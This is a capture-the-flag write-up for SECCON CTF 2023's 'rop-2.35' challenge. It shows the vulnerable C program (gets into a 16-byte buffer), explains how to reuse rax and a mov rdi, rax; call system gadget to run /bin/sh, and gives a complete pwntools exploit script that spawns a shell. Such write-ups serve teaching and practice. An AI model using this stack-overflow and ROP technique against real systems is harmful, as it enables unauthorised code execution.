# SECCON CTF 2023 - [pwn] rop-2.35

```c
#include <stdio.h>
#include <stdlib.h>

void main() {
    char buf[0x10];
    system("echo Enter something:");
    gets(buf);
}
```

There is an obvious stack overflow: `gets` writes into the 16-byte `buf` with no length bound, so anything longer than the buffer runs over the saved frame pointer and the return address of `main`.

## Exploitation

The gadgets in the binary are limited, so we use the return value (`rax`) of `gets`, which is `buf`, together with this gadget:

```c
.text:0000000000401169 mov rdi, rax
.text:000000000040116C call _system
```

to set `rdi` to `buf`, into which we write `/bin/sh`. Because `gets` is the last call before `main` returns, `rax` still holds the `buf` pointer when the chain starts. The chain also needs to be padded with 2 `ret` gadgets to align the stack; otherwise `system` will crash on a `movaps` instruction.

```py
#!/bin/env python3
from pwn import *

elf = context.binary = ELF("./chall")
context.arch = 'amd64'
context.terminal = ['tmux','splitw','-h']

io = None
convert = lambda x :x if type(x)==bytes else str(x).encode()
s = lambda data :io.send(convert(data))
sl = lambda data :io.sendline(convert(data))
sla = lambda delim,data :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru = lambda delims, drop=True :io.recvuntil(delims, drop, timeout=context.timeout)
r = lambda n :io.recv(n)
rl = lambda :io.recvline()

HOST, PORT = '10.10.10.10', 1337

gdbscript = '''
set follow-fork-mode parent
br *main+46
br *main+39
c
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gdbscript)
    if args.REMOTE:
        return remote(HOST, PORT)
    else:
        return process(elf.path)

io = start()

ret = 0x40101a
mov_rdi_rax = 0x401169

payload = b"/bin/sh\x00" * 3 + p64(ret)*2 + p64(mov_rdi_rax)
sl(payload)
io.interactive()
```